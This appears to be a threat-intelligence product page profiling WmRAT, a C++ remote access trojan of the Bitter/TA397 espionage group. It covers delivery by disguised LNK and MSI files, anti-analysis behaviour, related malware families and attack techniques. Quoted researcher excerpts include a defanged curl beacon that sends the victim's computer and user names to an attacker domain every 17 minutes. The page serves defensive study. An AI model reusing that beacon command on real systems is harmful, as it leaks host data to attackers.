WmRAT is a C++ remote access trojan associated with the Bitter espionage group, also tracked as TA397. It was first observed in 2022 and remained in operational use in later campaigns, including 2024 intrusions targeting government and defense-related organizations. Its use is consistent with Bitter’s broader intelligence-collection activity, which has focused on government, diplomatic, and defense entities, particularly in South Asia and more recently parts of EMEA.
WmRAT provides operators with interactive post-compromise access and collection capabilities. Reported functions include screenshot capture, file theft and file transfer, directory enumeration, geolocation gathering, and arbitrary command execution, including PowerShell-based execution. It uses numeric command identifiers in command-and-control communications. The malware also incorporates anti-analysis or evasion behavior by spawning junk threads and repeatedly invoking sleep operations to generate noise and complicate analysis.
Operational reporting links WmRAT to manually driven Bitter intrusions in which initial access was achieved through spearphishing and staged task-based beaconing, after which operators selectively deployed follow-on payloads. In documented 2024 activity, Bitter delivered WmRAT via an MSI installer during hands-on-keyboard operations after host triage. This deployment pattern indicates WmRAT is used as a second-stage espionage implant rather than a broad commodity payload.
WmRAT is part of a larger Bitter malware ecosystem that includes other custom downloaders, backdoors, RATs, and stealers. Across that ecosystem, recurring development patterns such as system-information collection, simple string obfuscation, and iterative command-and-control changes suggest a common developer base. Within that toolset, WmRAT stands out as a C++ RAT focused on surveillance, remote command execution, and data theft in targeted espionage operations.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
WmRAT is a C++ RAT first observed in 2022 and later seen in 2024 campaigns documented by Proofpoint.
only the subsequent issuance of wmrat and .net Trojans are very difficult to bypass the characteristics of the checking and killing function
24 distinct techniques documented for this family, organized by ATT&CK tactic.
The attack chain used... a shortcut (LNK) file that created a scheduled task on the target machine to pull down further payloads... the command then set up a scheduled task named “DsSvcCleanup”.
BDarkRAT includes standard RAT capabilities such as executing shell commands, downloading files, and managing files on the compromised system.
A newer variant of BDarkRAT ... expanded its capabilities to include screen capture and PowerShell command execution.
Important strings are obfuscated with a simple encoding algorithm where each character is decoded by subtracting 1.
The email included... a shortcut (LNK) file masquerading as a PDF (PUBLIC INVESTMENTS PROJECTS 2025.pdf.lnk)... the user is lured to believe that a PDF file is being opened due to the extension pdf.lnk. By default, Windows hides the real extension of a file.
WmRAT also employs some kind of anti-analysis by creating a number of junk threads. The threads loop for 1000 times just to get basic machine information. This is possibly done to generate noise in the logs of the victim’s environment. It also frequently calls the Sleep function throughout the code as an evasion technique.
This scheduled task attempted to send target host information (username and computer name) with the curl utility every 17 minutes... GET hxxp://jacknwoods[.]com/jacds.php?jin=%computername%_%username%
The downloader starts by collecting system information, which includes username, computer name, and the operating system.
WmRAT... enumerate directories and files... supported commands... 22: get file listing from given directory... MiyaRAT supports: GDIR – get directory tree, GFS – enumerate all files from a specific directory
WmRAT also employs some kind of anti-analysis by creating a number of junk threads. The threads loop for 1000 times just to get basic machine information. This is possibly done to generate noise in the logs of the victim’s environment. It also frequently calls the Sleep function throughout the code as an evasion technique.
KiwiStealer searches through the following predefined list of directories to gather files.
This scheduled task attempted to send target host information with the curl utility every 17 minutes to the domain jacknwoods[.]com... Proofpoint observed TA397 operators respond to these requests with manual commands...
WmRAT... can... upload or download files... MiyaRAT supports: SFS – connect to new socket to upload and download files via UPL/DWNL | This command downloads and runs the “anvrsa.msi” file on the target machine which installs the WmRAT file “anvrsa.exe”... Following that, Proofpoint researchers observed TA397 dropping another payload by downloading and running “gfxview.msi”.
10 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
7 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
C++ malware family used in an espionage intrusion against a Turkish defense-sector organization.
Remote access trojan used by Bitter/TA397 in targeting activity (Turkey noted) as part of an espionage-focused toolset.
wmRAT is a remote access trojan (RAT) deployed by TA397 for hands-on-keyboard access, enabling remote control and data exfiltration from victim systems.
A C++ RAT that decrypts strings including the C2 address, collects system information, and supports screenshot capture, file theft, and PowerShell execution. It also uses junk threads and frequent Sleep calls as anti-analysis or noise-generation techniques.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.